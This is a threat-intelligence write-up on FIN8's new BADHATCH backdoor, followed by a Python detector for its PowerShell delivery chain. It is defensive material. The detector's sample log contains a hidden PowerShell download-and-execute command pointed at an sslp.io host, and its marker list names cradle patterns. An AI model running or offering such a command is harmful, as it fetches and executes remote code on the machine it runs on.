FIN8 is a financially motivated threat group. After an interruption of roughly a year and a half, it has resurfaced with a more powerful version of its backdoor. The upgraded features include screen capture, proxy tunneling, credential theft, and fileless execution.
Researchers discovered new FIN8 attack activity that uses a new version of the BADHATCH backdoor to target companies in the insurance, retail, technology, and chemical industries around the world. The affected countries include the United States, Canada, South Africa, Puerto Rico, Panama, and Italy.
BADHATCH is custom malware of the FIN8 group with an extensible backdoor design; it was already used in the group's 2019 attacks. The new version brings significant improvements in persistence, encryption, information collection, and lateral movement, and it adds the ability to download files, which can pave the way for a variety of follow-on attacks. BADHATCH is a mature, highly advanced backdoor that uses several evasion and defense techniques, and the new version also attempts to evade security monitoring by using TLS encryption to hide its PowerShell commands.
FIN8 was first disclosed by FireEye in 2016. Its main targets are the retail, hospitality, and entertainment industries, and it uses spear phishing and malicious tools such as PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.
Figure: C2 commands in the new BADHATCH
Since April 2020, at least three different backdoor versions (v2.12 to v2.14) have been observed. The latest version of BADHATCH abuses a legitimate service, sslp.io, to download a PowerShell script, which then executes shellcode containing the BADHATCH DLL.
Besides establishing persistence, the PowerShell script is also responsible for privilege escalation, ensuring that every command run after the script has executed runs as the SYSTEM user.
A second evasion technique adopted by FIN8 is communication with the command-and-control (C2) server disguised as legitimate HTTP requests.
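The delivery chain just described (a PowerShell download from the abused sslp.io service, followed by execution as SYSTEM) leaves traces in endpoint process-creation telemetry that a defender can hunt for. The following detector is an added example written for this page; it is not code from the article or from any vendor report. It assumes a simplified, constructed process-creation log format (timestamp, pid, ppid, user, image, command line). Only the domain sslp.io comes from the article; the hostname labels, process ids, user names and the list of PowerShell download-cradle markers are assumptions made for illustration, and the SYSTEM-child heuristic is a generic hunting rule rather than a documented BADHATCH indicator.

```python
"""Hunt for the BADHATCH-style PowerShell delivery chain in process-creation logs.

Two heuristics are applied to each event:
  1. a PowerShell process whose command line contains a download/execute cradle
     and references the abused domain named in the article;
  2. a process running as SYSTEM whose parent is a PowerShell process that was
     NOT running as SYSTEM (the privilege-escalation step described above).

Every log line in SAMPLE_LOG is constructed for this example.
"""
import re
from dataclasses import dataclass

# Domain named in the article. Hostname labels in the sample log are made up.
ABUSED_DOMAINS = ("sslp.io",)

# Common PowerShell download/execution cradle markers (general PowerShell
# knowledge; these are assumptions, not indicators quoted from the article).
CRADLE_MARKERS = (
    "downloadstring", "invoke-webrequest", "iwr ",
    "invoke-expression", "iex ", "-encodedcommand", "-enc ",
)

# Constructed log format: ts pid ppid user image cmd
LOG_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'user="(?P<user>[^"]*)" image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)


@dataclass
class Event:
    ts: str
    pid: int
    ppid: int
    user: str
    image: str
    cmd: str


def parse_line(line):
    """Parse one constructed log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return Event(d["ts"], int(d["pid"]), int(d["ppid"]), d["user"],
                 d["image"].lower(), d["cmd"])


def is_powershell(ev):
    return ev.image.endswith(("powershell.exe", "pwsh.exe"))


def has_download_cradle(cmd):
    c = cmd.lower()
    return any(marker in c for marker in CRADLE_MARKERS)


def references_abused_domain(cmd):
    c = cmd.lower()
    return any(domain in c for domain in ABUSED_DOMAINS)


def is_system(user):
    return user.upper().endswith("SYSTEM")


def analyze(lines):
    """Return a list of (rule_name, pid) findings in log order."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        # Rule 1: PowerShell cradle fetching from the abused service.
        if is_powershell(ev) and has_download_cradle(ev.cmd) and references_abused_domain(ev.cmd):
            findings.append(("powershell_cradle_to_abused_domain", ev.pid))
        # Rule 2: SYSTEM-level child of a non-SYSTEM PowerShell (escalation heuristic).
        parent = by_pid.get(ev.ppid)
        if parent and is_powershell(parent) and is_system(ev.user) and not is_system(parent.user):
            findings.append(("system_child_of_user_powershell", ev.pid))
    return findings


# Constructed sample telemetry: one benign shell, one malicious cradle, one SYSTEM
# child of that PowerShell, one benign PowerShell download from an unrelated host,
# and one ordinary SYSTEM service process.
SAMPLE_LOG = [
    r'2021-03-10T12:00:00Z pid=3988 ppid=1000 user="CORP\jdoe" image=C:\Windows\explorer.exe cmd="explorer.exe"',
    r'2021-03-10T12:00:01Z pid=4120 ppid=3988 user="CORP\jdoe" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -nop -w hidden -c IEX (iwr -UseBasicParsing https://203-0-113-10.sslp.io/s).Content"',
    r'2021-03-10T12:00:04Z pid=5012 ppid=4120 user="NT AUTHORITY\SYSTEM" image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c whoami"',
    r'2021-03-10T12:00:09Z pid=6100 ppid=3988 user="CORP\jdoe" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -c iwr https://updates.example.com/x -OutFile x.msi"',
    r'2021-03-10T12:00:12Z pid=7000 ppid=700 user="NT AUTHORITY\SYSTEM" image=C:\Windows\System32\svchost.exe cmd="svchost.exe -k netsvcs"',
]

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_LOG):
        print(f"{rule}: pid {pid}")
```

Run stand-alone, the block reports the cradle on pid 4120 and the SYSTEM-level child on pid 5012, while the benign PowerShell download from an unrelated host and the ordinary service process produce no findings. In a real deployment the two rules would be fed from Sysmon or EDR process-creation events and the cradle marker list tuned to the environment's own administrative scripts.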
Figure: Distribution of affected countries